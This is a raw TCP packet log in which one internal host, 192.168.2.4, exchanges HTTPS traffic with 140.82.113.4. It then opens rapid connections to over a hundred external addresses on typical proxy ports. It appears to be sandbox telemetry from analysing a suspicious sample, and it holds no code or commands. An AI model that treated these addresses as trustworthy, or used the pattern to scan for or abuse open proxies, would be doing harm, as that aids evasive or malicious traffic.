                                                                Mar 11, 2024 16:15:13.045795918 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.045803070 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.045892000 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.045937061 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.045947075 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.045986891 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.046026945 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.046035051 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.046160936 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.046204090 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.046206951 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.046216965 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.046257019 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.046345949 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.046428919 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.046468973 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.046477079 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.046546936 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.046586037 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.046591997 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.046833038 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.046875954 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.046883106 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.046961069 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047003984 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.047012091 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047204971 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047245979 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047316074 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.047317028 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047332048 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047353029 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.047425985 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047458887 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.047466040 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047545910 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047579050 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.047583103 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047591925 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047624111 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.047632933 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047719002 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047751904 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.047759056 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047926903 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047960043 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.047971964 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.047980070 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.048017025 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.048046112 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.048268080 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.048304081 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.048317909 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.048326015 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.048388004 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.048393011 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.048403025 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.048435926 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.048449039 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.048558950 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.048593998 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.048600912 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.048785925 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.048826933 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.048836946 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.048973083 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.049016953 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.049021959 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.049032927 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.049063921 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.049073935 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.049221992 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.049267054 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.049273968 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.049330950 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.049365044 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.049372911 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.049449921 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.049483061 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.049490929 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.049498081 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.049536943 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.049545050 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.049637079 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.049670935 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.049676895 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.104844093 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.264053106 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264153004 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264190912 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264225006 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.264255047 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264293909 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264298916 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.264308929 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264349937 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.264358044 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264413118 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264455080 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.264465094 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264506102 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264547110 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.264552116 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264662981 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264700890 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.264707088 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264810085 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264842987 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264844894 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.264856100 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264899969 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.264905930 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.264980078 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265013933 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.265019894 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265068054 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265109062 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.265115976 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265177965 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265216112 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265218973 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.265224934 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265264988 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.265322924 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265417099 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265459061 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.265465021 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265516043 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265554905 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.265561104 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265623093 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265661955 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.265667915 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265820026 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265857935 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.265866041 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265930891 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.265970945 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.265979052 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266036987 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266073942 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.266078949 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266087055 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266123056 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.266129971 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266223907 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266263008 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.266268969 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266367912 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266407013 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.266413927 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266450882 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266489029 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.266494989 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266613007 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266653061 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.266659021 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266715050 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266752958 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.266760111 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266799927 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266834021 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266839027 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.266846895 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.266887903 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.267015934 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.267235041 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.267275095 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.267282963 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.267353058 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.267386913 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.267389059 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.267398119 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.267433882 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.267497063 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.267569065 CET44349731140.82.113.4192.168.2.4
                                                                Mar 11, 2024 16:15:13.267610073 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.552301884 CET49731443192.168.2.4140.82.113.4
                                                                Mar 11, 2024 16:15:13.647073030 CET4973450640192.168.2.4203.161.32.242
                                                                Mar 11, 2024 16:15:13.647136927 CET497358080192.168.2.4103.141.66.78
                                                                Mar 11, 2024 16:15:13.647172928 CET497368080192.168.2.4103.186.8.162
                                                                Mar 11, 2024 16:15:13.657056093 CET497375678192.168.2.491.187.55.39
                                                                Mar 11, 2024 16:15:13.657795906 CET497388080192.168.2.4103.169.130.46
                                                                Mar 11, 2024 16:15:13.658796072 CET4973980192.168.2.418.141.177.23
                                                                Mar 11, 2024 16:15:13.659599066 CET497405212192.168.2.445.11.95.165
                                                                Mar 11, 2024 16:15:13.660351992 CET4974144607192.168.2.4162.241.6.97
                                                                Mar 11, 2024 16:15:13.661142111 CET4974215082192.168.2.445.77.111.135
                                                                Mar 11, 2024 16:15:13.661885023 CET497433129192.168.2.420.219.180.149
                                                                Mar 11, 2024 16:15:13.662796974 CET49744587192.168.2.4160.248.80.91
                                                                Mar 11, 2024 16:15:13.663445950 CET4974580192.168.2.4172.67.254.127
                                                                Mar 11, 2024 16:15:13.665036917 CET4973380192.168.2.441.74.91.244
                                                                Mar 11, 2024 16:15:13.669188023 CET497468081192.168.2.4154.72.90.74
                                                                Mar 11, 2024 16:15:13.684516907 CET497479375192.168.2.492.204.134.38
                                                                Mar 11, 2024 16:15:13.684597015 CET4974848892192.168.2.472.167.222.113
                                                                Mar 11, 2024 16:15:13.685169935 CET4974984192.168.2.4103.26.108.118
                                                                Mar 11, 2024 16:15:13.687577963 CET497508081192.168.2.479.110.196.145
                                                                Mar 11, 2024 16:15:13.688621044 CET4975180192.168.2.450.217.226.43
                                                                Mar 11, 2024 16:15:13.691046953 CET4975280192.168.2.4190.186.237.103
                                                                Mar 11, 2024 16:15:13.694875956 CET497534145192.168.2.4152.32.78.24
                                                                Mar 11, 2024 16:15:13.696155071 CET497548080192.168.2.4201.20.67.70
                                                                Mar 11, 2024 16:15:13.697545052 CET497551080192.168.2.447.91.110.154
                                                                Mar 11, 2024 16:15:13.699476957 CET497568089192.168.2.4117.70.49.235
                                                                Mar 11, 2024 16:15:13.701601028 CET4975749478192.168.2.4162.241.70.64
                                                                Mar 11, 2024 16:15:13.704346895 CET497588000192.168.2.414.103.24.148
                                                                Mar 11, 2024 16:15:13.705949068 CET4975937736192.168.2.4207.180.234.220
                                                                Mar 11, 2024 16:15:13.708156109 CET4976033590192.168.2.485.120.30.66
                                                                Mar 11, 2024 16:15:13.710705996 CET4976180192.168.2.4104.16.226.6
                                                                Mar 11, 2024 16:15:13.712754011 CET497624145192.168.2.4142.54.237.34
                                                                Mar 11, 2024 16:15:13.716476917 CET497633128192.168.2.43.24.58.156
                                                                Mar 11, 2024 16:15:13.720427036 CET497648800192.168.2.443.133.136.208
                                                                Mar 11, 2024 16:15:13.721008062 CET497658888192.168.2.4200.174.198.95
                                                                Mar 11, 2024 16:15:13.723839998 CET4976659920192.168.2.445.56.220.210
                                                                Mar 11, 2024 16:15:13.726794958 CET497673125192.168.2.4103.226.232.188
                                                                Mar 11, 2024 16:15:13.730978966 CET4976880192.168.2.4104.21.6.88
                                                                Mar 11, 2024 16:15:13.731508970 CET497694995192.168.2.4116.97.240.147
                                                                Mar 11, 2024 16:15:13.735106945 CET497705678192.168.2.4143.255.140.28
                                                                Mar 11, 2024 16:15:13.737431049 CET497718081192.168.2.4113.53.3.242
                                                                Mar 11, 2024 16:15:13.739145994 CET497728080192.168.2.4103.167.68.255
                                                                Mar 11, 2024 16:15:13.741432905 CET497735678192.168.2.4122.152.53.25
                                                                Mar 11, 2024 16:15:13.743848085 CET4977440351192.168.2.451.222.241.157
                                                                Mar 11, 2024 16:15:13.746351957 CET4977530951192.168.2.472.10.160.90
                                                                Mar 11, 2024 16:15:13.749062061 CET497763128192.168.2.48.209.255.13
                                                                Mar 11, 2024 16:15:13.751156092 CET4977758740192.168.2.4162.214.90.49
                                                                Mar 11, 2024 16:15:13.753504038 CET4977812334192.168.2.4194.4.50.91
                                                                Mar 11, 2024 16:15:13.755505085 CET497796969192.168.2.4103.199.155.18
                                                                Mar 11, 2024 16:15:13.758471966 CET49780443192.168.2.44.182.9.108
                                                                Mar 11, 2024 16:15:13.758503914 CET443497804.182.9.108192.168.2.4
                                                                Mar 11, 2024 16:15:13.758580923 CET49780443192.168.2.44.182.9.108
                                                                Mar 11, 2024 16:15:13.760225058 CET49780443192.168.2.44.182.9.108
                                                                Mar 11, 2024 16:15:13.760245085 CET443497804.182.9.108192.168.2.4
                                                                Mar 11, 2024 16:15:13.760425091 CET443497804.182.9.108192.168.2.4
                                                                Mar 11, 2024 16:15:13.761215925 CET4978122881192.168.2.4208.109.14.49
                                                                Mar 11, 2024 16:15:13.762140036 CET4978231551192.168.2.491.213.119.246
                                                                Mar 11, 2024 16:15:13.766026020 CET497838123192.168.2.420.24.43.214
                                                                Mar 11, 2024 16:15:13.769468069 CET497845678192.168.2.4178.212.51.79
                                                                Mar 11, 2024 16:15:13.772845984 CET497858090192.168.2.4103.127.106.249
                                                                Mar 11, 2024 16:15:13.777306080 CET497868080192.168.2.4185.108.141.19
                                                                Mar 11, 2024 16:15:13.780601978 CET497871080192.168.2.4138.36.150.16
                                                                Mar 11, 2024 16:15:13.782416105 CET4978880192.168.2.4172.67.182.169
                                                                Mar 11, 2024 16:15:13.784002066 CET49789443192.168.2.44.182.9.108
                                                                Mar 11, 2024 16:15:13.784037113 CET443497894.182.9.108192.168.2.4
                                                                Mar 11, 2024 16:15:13.784101009 CET49789443192.168.2.44.182.9.108
                                                                Mar 11, 2024 16:15:13.785356998 CET49789443192.168.2.44.182.9.108
                                                                Mar 11, 2024 16:15:13.785379887 CET443497894.182.9.108192.168.2.4
                                                                Mar 11, 2024 16:15:13.785422087 CET443497894.182.9.108192.168.2.4
                                                                Mar 11, 2024 16:15:13.786385059 CET497904495192.168.2.467.43.228.252
                                                                Mar 11, 2024 16:15:13.788486958 CET4979124183192.168.2.492.205.61.38
                                                                Mar 11, 2024 16:15:13.792124033 CET497929764192.168.2.4162.243.102.207
                                                                Mar 11, 2024 16:15:13.795268059 CET4979380192.168.2.4104.17.9.114
                                                                Mar 11, 2024 16:15:13.799124002 CET497943128192.168.2.446.245.77.52
                                                                Mar 11, 2024 16:15:13.801248074 CET497958402192.168.2.445.229.10.98
                                                                Mar 11, 2024 16:15:13.804183006 CET4979615673192.168.2.443.155.165.196
                                                                Mar 11, 2024 16:15:13.817797899 CET8049745172.67.254.127192.168.2.4
                                                                Mar 11, 2024 16:15:13.817909002 CET4974580192.168.2.4172.67.254.127
                                                                Mar 11, 2024 16:15:13.818134069 CET4974580192.168.2.4172.67.254.127
                                                                Mar 11, 2024 16:15:13.818959951 CET4979780192.168.2.450.239.72.18
                                                                Mar 11, 2024 16:15:13.821356058 CET497988080192.168.2.420.37.207.8
                                                                Mar 11, 2024 16:15:13.823348999 CET4979928971192.168.2.467.43.228.254
                                                                Mar 11, 2024 16:15:13.825112104 CET4980037876192.168.2.4162.241.50.179
                                                                Mar 11, 2024 16:15:13.846868992 CET4980180192.168.2.450.174.145.9
                                                                Mar 11, 2024 16:15:13.849426985 CET49802999192.168.2.4131.100.48.75
                                                                Mar 11, 2024 16:15:13.851301908 CET498038080192.168.2.4149.126.101.162
                                                                Mar 11, 2024 16:15:13.852838039 CET4980450605192.168.2.451.81.89.146
                                                                Mar 11, 2024 16:15:13.854897976 CET498054145192.168.2.4212.231.197.29
                                                                Mar 11, 2024 16:15:13.856225967 CET498068080192.168.2.442.200.196.208
                                                                Mar 11, 2024 16:15:13.858685970 CET4980780192.168.2.493.188.161.84
                                                                Mar 11, 2024 16:15:13.861257076 CET4980831033192.168.2.467.43.228.253
                                                                Mar 11, 2024 16:15:13.862927914 CET4980980192.168.2.431.207.38.66
                                                                Mar 11, 2024 16:15:13.864399910 CET498105678192.168.2.4186.248.87.172
                                                                Mar 11, 2024 16:15:13.865354061 CET8049761104.16.226.6192.168.2.4
                                                                Mar 11, 2024 16:15:13.865434885 CET4976180192.168.2.4104.16.226.6
                                                                Mar 11, 2024 16:15:13.865722895 CET4976180192.168.2.4104.16.226.6
                                                                Mar 11, 2024 16:15:13.866312027 CET4981132221192.168.2.467.43.228.254
                                                                Mar 11, 2024 16:15:13.868455887 CET498128080192.168.2.4103.114.53.2
                                                                Mar 11, 2024 16:15:13.870186090 CET4460749741162.241.6.97192.168.2.4
                                                                Mar 11, 2024 16:15:13.870306015 CET4981331908192.168.2.464.227.108.25
                                                                Mar 11, 2024 16:15:13.871701002 CET49814999192.168.2.445.178.133.60
                                                                Mar 11, 2024 16:15:13.874304056 CET498155038192.168.2.445.11.95.165
                                                                Mar 11, 2024 16:15:13.876972914 CET49816999192.168.2.4200.106.184.97
                                                                Mar 11, 2024 16:15:13.879440069 CET49817999192.168.2.4201.71.3.60
                                                                Mar 11, 2024 16:15:13.881843090 CET4981854240192.168.2.4200.25.254.193
                                                                Mar 11, 2024 16:15:13.883403063 CET150824974245.77.111.135192.168.2.4
                                                                Mar 11, 2024 16:15:13.884080887 CET4981980192.168.2.450.239.72.19
                                                                Mar 11, 2024 16:15:13.885343075 CET8049768104.21.6.88192.168.2.4
                                                                Mar 11, 2024 16:15:13.885878086 CET4976880192.168.2.4104.21.6.88
                                                                Mar 11, 2024 16:15:13.885878086 CET4976880192.168.2.4104.21.6.88
                                                                Mar 11, 2024 16:15:13.886975050 CET498208089192.168.2.4114.231.45.101
                                                                Mar 11, 2024 16:15:13.889372110 CET4982180192.168.2.445.12.31.3
                                                                Mar 11, 2024 16:15:13.891716957 CET498223129192.168.2.4115.248.66.131
                                                                Mar 11, 2024 16:15:13.894411087 CET4982345876192.168.2.4207.180.234.220
                                                                Mar 11, 2024 16:15:13.896225929 CET4982437400192.168.2.4171.244.140.160
                                                                Mar 11, 2024 16:15:13.897799969 CET498258081192.168.2.4193.239.56.84
                                                                Mar 11, 2024 16:15:13.900017977 CET498268080192.168.2.414.207.41.71
                                                                Mar 11, 2024 16:15:13.901717901 CET498273128192.168.2.4196.202.40.17
                                                                Mar 11, 2024 16:15:13.903551102 CET498281080192.168.2.4185.82.87.30
                                                                Mar 11, 2024 16:15:13.905237913 CET49829999192.168.2.4157.100.63.69
                                                                Mar 11, 2024 16:15:13.906842947 CET498304145192.168.2.4184.181.217.194
                                                                Mar 11, 2024 16:15:13.908324957 CET498313629192.168.2.4188.124.15.13
                                                                Mar 11, 2024 16:15:13.910129070 CET4983280192.168.2.4149.202.91.219
                                                                Mar 11, 2024 16:15:13.911732912 CET498331111192.168.2.4103.8.164.16
                                                                Mar 11, 2024 16:15:13.913742065 CET498345678192.168.2.4193.106.57.96
                                                                Mar 11, 2024 16:15:13.915496111 CET4983580192.168.2.4104.17.84.150
                                                                Mar 11, 2024 16:15:13.916946888 CET93754974792.204.134.38192.168.2.4
                                                                Mar 11, 2024 16:15:13.917207003 CET498368080192.168.2.4103.190.54.141
                                                                Mar 11, 2024 16:15:13.919353008 CET4983780192.168.2.4143.198.226.25
                                                                Mar 11, 2024 16:15:13.920934916 CET498388090192.168.2.4115.127.112.74
                                                                Mar 11, 2024 16:15:13.922770023 CET4983926315192.168.2.472.10.160.171
                                                                Mar 11, 2024 16:15:13.924465895 CET414549762142.54.237.34192.168.2.4
                                                                Mar 11, 2024 16:15:13.924526930 CET497624145192.168.2.4142.54.237.34
                                                                Mar 11, 2024 16:15:13.924846888 CET497624145192.168.2.4142.54.237.34
                                                                Mar 11, 2024 16:15:13.925093889 CET498403128192.168.2.4193.239.86.249
                                                                Mar 11, 2024 16:15:13.926578045 CET498411080192.168.2.45.180.19.140
                                                                Mar 11, 2024 16:15:13.928610086 CET49842999192.168.2.445.181.123.145
                                                                Mar 11, 2024 16:15:13.930682898 CET4984380192.168.2.4104.16.81.76
                                                                Mar 11, 2024 16:15:13.932784081 CET498448080192.168.2.4193.34.21.200
                                                                Mar 11, 2024 16:15:13.934551954 CET498459401192.168.2.4147.75.92.251
                                                                Mar 11, 2024 16:15:13.936584949 CET498463128192.168.2.415.236.106.236
                                                                Mar 11, 2024 16:15:13.936815977 CET8049788172.67.182.169192.168.2.4
                                                                Mar 11, 2024 16:15:13.936878920 CET4978880192.168.2.4172.67.182.169
                                                                Mar 11, 2024 16:15:13.937225103 CET4978880192.168.2.4172.67.182.169
                                                                Mar 11, 2024 16:15:13.938621998 CET498475678192.168.2.445.228.147.209
                                                                Mar 11, 2024 16:15:13.940623045 CET498481080192.168.2.493.171.243.253
                                                                Mar 11, 2024 16:15:13.942150116 CET498499039192.168.2.467.43.227.228
                                                                Mar 11, 2024 16:15:13.944391012 CET498505678192.168.2.4123.108.98.108
                                                                Mar 11, 2024 16:15:13.946455002 CET4985116379192.168.2.4163.172.147.9
                                                                Mar 11, 2024 16:15:13.948340893 CET498529002192.168.2.4220.248.70.237
                                                                Mar 11, 2024 16:15:13.949538946 CET8049793104.17.9.114192.168.2.4
                                                                Mar 11, 2024 16:15:13.949605942 CET4979380192.168.2.4104.17.9.114
                                                                Mar 11, 2024 16:15:13.949948072 CET4979380192.168.2.4104.17.9.114
                                                                Mar 11, 2024 16:15:13.950567961 CET498538197192.168.2.458.234.116.197
                                                                Mar 11, 2024 16:15:13.953274012 CET4985413335192.168.2.4172.67.185.199
                                                                Mar 11, 2024 16:15:13.954099894 CET4985555019192.168.2.492.204.135.37
                                                                Mar 11, 2024 16:15:13.955826998 CET4985680192.168.2.450.172.218.160
                                                                Mar 11, 2024 16:15:13.957504034 CET498573129192.168.2.420.204.212.76
                                                                Mar 11, 2024 16:15:13.959286928 CET498583128192.168.2.4155.50.241.99
                                                                Mar 11, 2024 16:15:13.961273909 CET4985980192.168.2.452.24.80.166
                                                                Mar 11, 2024 16:15:13.964365959 CET403514977451.222.241.157192.168.2.4
                                                                Mar 11, 2024 16:15:13.964749098 CET498618080192.168.2.4160.19.169.208
                                                                Mar 11, 2024 16:15:13.965198994 CET498601080192.168.2.45.252.23.220
                                                                Mar 11, 2024 16:15:13.966641903 CET4986260781192.168.2.4132.148.129.254
                                                                Mar 11, 2024 16:15:13.968818903 CET4986380192.168.2.4185.162.229.127
